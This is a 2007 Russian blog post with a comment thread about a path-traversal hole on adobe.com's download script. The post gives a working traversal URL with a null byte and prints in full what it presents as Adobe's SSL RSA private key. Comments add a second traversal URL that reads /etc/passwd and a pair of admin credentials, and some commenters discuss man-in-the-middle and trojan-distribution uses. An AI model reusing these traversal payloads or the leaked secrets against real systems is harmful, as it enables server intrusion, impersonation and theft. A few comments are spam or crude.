Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет mumuntu ([info]mumuntu)
@ 2007-09-26 19:42:00
Previous Entry  Add to memories!  Tell a Friend!  Next Entry
Настроение:Хакер Хэлл
Музыка:придет и за вами

Показали сейчас отличное.
Заходим сюда: http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/ssl.key/www.adobe.com.key%00.
И видим вот что:

-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC+gu/eSRi5ThbYrVQcewZFQc/Kfa8B/gKOKzD98aY9hvNFj3pd
w5kw+dSlOCU78jrGkbP4m0GyNN27zDAQlWPEkmyzrOqBYvLnWFQ2kTzPlMBNt2yd
F5TsXqCJvqbwvTn+ExBxvBQyoYpdjl37sk9cyqqAVtavbx1UL5956EWW5wIDAQAB AoGATkxUN2CFd8tfWmhKVHY/ioFU3F0xazkxZarctNH3R/xJyYIBgb3dHSLgwZLE
wtF4VJoXhIqSwqI1q3RtILO1T6OioXVRPsHOZZCB0SV+67Qk0/ukm9rftQUJ95Jx v4oM4pugVZieScQ3eZaShT0JumjMd3+dQybkJx6iHQ9wO1ECQQDywfyHvZ6Oa45X
cjOHIGHBDd3kXyJdVjxljtELO0tv2qPYw6UCAdQxjA5Zit+2tCrOVNZx1Y0woUdH
A7DG0KGpAkEAyOdaM9pXB7Bw5fjuIH5BaZXT1ZgdY90nlnYq00kbZVaj5CS8mTAQ
/brK0dOAM3a0KXP4YXw++WxIV2h+WFnuDwJBAKMgVdjFQ/HCNtFuTU/lI6s97TiT
8Ry1YTqBgNnCS4vraSS1O4Ggxv1QdygWmQRGB2nFOqEd9pWSGrqOsVC4S5kCQQDF
xuOI6mgE3NC3xNB/0msIy4On4UEFn6CqQZg1OeIraBidrwCveZ8weaPS3nh1sWT4
7f7V0V+ZYdzxl5/R0G5HAkAzMm0Rs6TOIuUvKAPH0YWkbzyTNzIsMUlf2plbFko3 KE1w2vwntoaGaZu366ZE9B+GlunvZsR8o0gBtnNc8rur
-----END RSA PRIVATE KEY-----

То есть, ни что иное, как закрытый ключ компании Adobe.
Ничего ребята работают, молодцы.


(Добавить комментарий)


[info]blacklion@lj
2007-09-26 11:57 (ссылка)
Какой из?
Самый-то интересный — каким подписывают плагины к Acrobat Reader…

(Ответить)


[info]sharlei@lj
2007-09-26 12:01 (ссылка)
шо он может дать простому гетеросексуальеному человеку?

(Ответить) (Ветвь дискуссии)


[info]latexzapal@lj
2007-09-26 14:23 (ссылка)
Это даёт возможность
заглянуть в анальные глубины
модного прогрессивного софта.

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: Reply to your comment...
[info]sharlei@lj
2007-09-26 14:30 (ссылка)
анальные глубины мне отвратительные. вдруг если я в них гляну они в
меня тоже глянут

(Ответить) (Уровень выше)


[info]enkryptor@lj
2007-09-27 03:06 (ссылка)
ничего, это ключ, которым расшифровывались безопасные (https) подключения к сайту adobe.com

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]sanmai@lj
2007-09-27 03:23 (ссылка)
Ключевое слово: расшифровывались

(Ответить) (Уровень выше)


[info]asper@lj
2007-10-09 07:21 (ссылка)
можно притвориться сайтом адоба, если еще и днс им сломать.
и распространить троян под видом адобридера, например.

(Ответить) (Уровень выше)


[info]blacklion@lj
2007-09-26 12:03 (ссылка)
Кстати, httpd.conf тоже отдают. Да и остальные файлики, думаю, тоже.

(Ответить) (Ветвь дискуссии)


[info]piggymouse@lj
2007-09-26 12:08 (ссылка)
И htpasswd. И вообще всё, не только из-под /usr/local/apache

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]blacklion@lj
2007-09-26 12:10 (ссылка)
/etc/shadow не отдают :) /etc/passwd отдают и становится ясно, что это солярко.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]piggymouse@lj
2007-09-26 12:32 (ссылка)
Ага.

(Ответить) (Уровень выше)


[info]alexshubert@lj
2007-09-26 12:42 (ссылка)
я криворукий. мне не отдает.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]blacklion@lj
2007-09-26 13:23 (ссылка)
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//etc/passwd%00
Но мне уже тоже не отдают :)
А ключ — до сих пор отдают. Т.е. фиксят что ли прямо щас?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]alexshubert@lj
2007-09-26 13:40 (ссылка)
а почему нельзя проверять путь на .. и на ./? Конечно, включая всякие коды для этих же последовательностей?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]blacklion@lj
2007-09-26 14:02 (ссылка)
Какой-то нелепый вопрос. Конечно можно проверять. Но это классический баг — не проверять.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]alexshubert@lj
2007-09-26 14:10 (ссылка)
Я нечаянно стер первую часть поста.
*глядя на то, как долго они закрывают дыру по частям*

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]blacklion@lj
2007-09-26 14:18 (ссылка)
А. Ну фиг их знает. Вот, говорят совсем закрыли.

(Ответить) (Уровень выше)

нефига не баг
(Анонимно)
2007-09-27 02:12 (ссылка)
пермишенами разруливать надо
ваще прилага из chroot'а запускаться должна, что бы такого сделать нельзя было

(Ответить) (Уровень выше)


[info]vap@lj
2007-09-26 14:33 (ссылка)
Имхо, нормальное решение - в принципе не формировать путь из пользовательских данных, даже с проверками.
Иначе где-нибудь рано или поздно таки подловят.

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]oas@lj
2007-09-26 18:45 (ссылка)
Зато типа спорт и соревнование умов.

(Ответить) (Уровень выше)


[info]piggymouse@lj
2007-09-26 12:08 (ссылка)
Но приватный ключ это конечно круто.

(Ответить) (Уровень выше)


[info]piggymouse@lj
2007-09-26 12:09 (ссылка)
Саша, сейчас компания Адобе подаст на тебя в суп, то есть в суд.

(Ответить) (Ветвь дискуссии)


[info]levgem@lj
2007-09-26 14:51 (ссылка)
что-то Алекс подозрительно долго не отвечает. Я за него уже беспокоюсь

(Ответить) (Уровень выше)


[info]viktoriabufyx@lj
2008-07-17 03:54 (ссылка)
Будет тебе сейчас денатурализация. ". Или, c патетическим идиотизмом восклицали: "Гена.

(Ответить) (Уровень выше)


[info]floccosum@lj
2007-09-26 12:18 (ссылка)
это здорово

(Ответить)


[info]oramahmaalhur@lj
2007-09-26 12:27 (ссылка)
пииии*ц....

(Ответить)


[info]vinsent_ru@lj
2007-09-26 12:36 (ссылка)
причем хак старый как дерьмо гейца :))))

(Ответить)


[info]6a6ep@lj
2007-09-26 12:38 (ссылка)
Красота какая.
Причём заметят они эту дырку чисто по слэш-дот эффекту, там щаз небось по дереву сервака сотни людей бегают, ковыряют и качают.

(Ответить) (Ветвь дискуссии)


[info]asper@lj
2007-10-09 07:19 (ссылка)
скорее заметят по тому, что это опубликовали пол-интернета)

(Ответить) (Уровень выше)


[info]kirill_hates_u@lj
2007-09-26 12:38 (ссылка)
Это можно использовать для лицензионных бесплатных фотошопа, люстры и аудишена?

(Ответить) (Ветвь дискуссии)


[info]enkryptor@lj
2007-09-27 03:05 (ссылка)
а что у тебя с ними не работает?

(Ответить) (Уровень выше)


[info]6a6ep@lj
2007-09-26 12:40 (ссылка)
Есть мнение, этому посту место в топе яндекса Ж8)

(Ответить)

гы
[info]altyn@lj
2007-09-26 13:06 (ссылка)
мало того шо апач не пропатчили, так еще мозгов не хватило смарткартой пользоваться.

(Ответить) (Ветвь дискуссии)

Re: гы
[info]kyprizel@lj
2007-09-26 13:09 (ссылка)
причем здесь апач?
причем здесь смарткарта?

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]altyn@lj
2007-09-26 13:12 (ссылка)
ну с апачем может я поигарячился,
а вот смарткарта - при том, что ключик в ней хранится,и ни при каких условиях он считан быть не может, подпись через спец. апи идет. ну и ясен пень подписывать нужно асинхронно, а не в процессе обработке реквеста.

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]kyprizel@lj
2007-09-26 14:02 (ссылка)
вы знаете много сайтов, где для обеспечения HTTPs используются смарткарты? я - ни одного
к тому же я не уверен, что апач это умеет
ничего криминального в хранении ключа на сервере я не вижу, разве что возможно стоило его зашифровать
по сути, ну получили вы этот ключ - что он вам дает?

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]blacklion@lj
2007-09-26 14:16 (ссылка)
Он мне даёт устраивать man-in-a-middle атаки. И если е-шоп адобы закрыт тем же сертификатом, что и www.adobe.com, то получать кредитки покупателей.
По сути — им в срочном порядке надо перевыпускать сертификаты и старые вносить в CLR CA.

(Ответить) (Уровень выше) (Ветвь дискуссии)

Re: гы
[info]kyprizel@lj
2007-09-26 16:01 (ссылка)
при условии доступа к трафику, что маловероятно в данном случае. есть ключ, только расшифровывать им нечего :)
сделают revoke, ничего страшного

(Ответить) (Уровень выше)

Re: гы
[info]altyn@lj
2007-09-27 07:44 (ссылка)
а зачем для HTTPs сессии приватный ключ? нужен он только в момент подписи серверного сертификата, подписывается такой сертификат обычно не собственным ключом, а каким-нить верисайном, который присутствует в трастед рут большинства клиентов.
другое дело - подпись или дешифрация каких-либо документов.

(Ответить) (Уровень выше)


[info]kyprizel@lj
2007-09-26 13:10 (ссылка)
рефереры на адобе засветили, думаю реакция абуз тим будет не долгой :(

(Ответить) (Ветвь дискуссии)


[info]sukhorukov@lj
2007-09-26 13:24 (ссылка)
Обычный урл. За него что-то может быть? :)

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]kyprizel@lj
2007-09-26 14:05 (ссылка)
суспенд ;)

(Ответить) (Уровень выше)


[info]angryxpeh@lj
2007-09-26 13:24 (ссылка)
WebObjectsAdminUsername edoba
WebObjectsAdminPassword mudhouse

А шо лучше, похапэ или джаба?

(Ответить)


[info]valxp@lj
2007-09-26 13:27 (ссылка)
Все, до них дошло :(

(Ответить)


[info]tupoy@lj
2007-09-26 13:27 (ссылка)
Site Area Temporarily Unavailable
всё, прикрыли лавочку :)))

(Ответить)


[info]_traut_@lj
2007-09-26 13:28 (ссылка)
всЕ, вырубили :) причем весь download

(Ответить)


[info]angryxpeh@lj
2007-09-26 13:28 (ссылка)
We're sorry, the site area you've requested is unavailable due to scheduled maintenance. Please try again later.

Бугого.

(Ответить)


[info]butilkaroma@lj
2007-09-26 16:20 (ссылка)
блин... даже глянуть не успел =(

(Ответить)


[info]oas@lj
2007-09-26 18:43 (ссылка)
Интересно, это им в наследство от Macromedia досталось?

(Ответить)

Вы попале фтопЪ[30][ку]
[info]jaluzzi@lj
2007-09-26 20:15 (ссылка)
Привіт, я дещо почитал в тебе і вирішил - треба тебе запишувати в френди! Давай дружити! )))

(Ответить) (Ветвь дискуссии)

Re: Вы попале фтопЪ[30][ку]
[info]rajaka@lj
2007-09-27 07:34 (ссылка)
Давай!

(Ответить) (Уровень выше)


[info]topb_ot30@lj
2007-09-26 20:50 (ссылка)
Вы попали в top30 на яндексе самых обсуждаемых тем в блогосфере. Поэтому копия вашего поста доступна в ленте по ссылке (http://topbot2.livejournal.com/2655354.html)Почитать текст со всеми комментариями можно тут (http://deep-water.ru/?http://alexclear.livejournal.com/414066.html)Это Ваш 2-й ТОПовый пост за последний год (http://deep-water.ru/top/). Посмотреть статистику автора можно тут (http://deep-water.ru/top/info.php?id=289).Этот "бот не имеет отношения к Яндексу" © НадежныйИсточникImage

(Ответить)


[info]moyra_athropos@lj
2007-09-26 22:20 (ссылка)
труЪ)
Не только у наших руки из интересных мест

(Ответить)


[info]swimmer979@lj
2007-09-27 02:55 (ссылка)
Встаёт, словно хуй, вопрос: а автора журнала не засуспендят? Не за ссылку, а за строки, начинающиеся с "-----BEGIN RSA PRIVATE KEY-----", опубликованные в тексте поста.

(Ответить) (Ветвь дискуссии)


[info]enkryptor@lj
2007-09-27 03:04 (ссылка)
проще адобу сменить ключ )))

(Ответить) (Уровень выше)


[info]sanmai@lj
2007-09-27 03:24 (ссылка)
Опаздал.

(Ответить)


[info]6a6ep@lj
2007-09-27 04:49 (ссылка)
http://www.theregister.co.uk/2007/09/27/adobe_website_leak/

(Ответить) (Ветвь дискуссии)


[info]ex_andrey_f300@lj
2007-09-27 06:57 (ссылка)
Криворукие программисты. В универах лучших учатся. Вот пример
http://www.melikyan.com/dalshe/articles/badcode.html

Там еще и не такое.
"network despite the best efforts of the company's security team"
http://www.theregister.com/2007/03/13/vlad_impales_ebay/
Так и не продвинулись на шаг к решению проблемы.

(Ответить) (Уровень выше)


[info]myjuk@lj
2007-09-27 12:43 (ссылка)
http://baldur.ru/go_sp.php?92

(Ответить)

Биржа ссылок
[info]shapovalov_aebk@lj
2010-03-06 11:29 (ссылка)
Дорогой администратор alexclear.livejournal.com !
Появилась новейшая биржа ссылок для авторов блогов - Читайте далее здесь (http://tinyurl.com/yc89dyh)

(Ответить)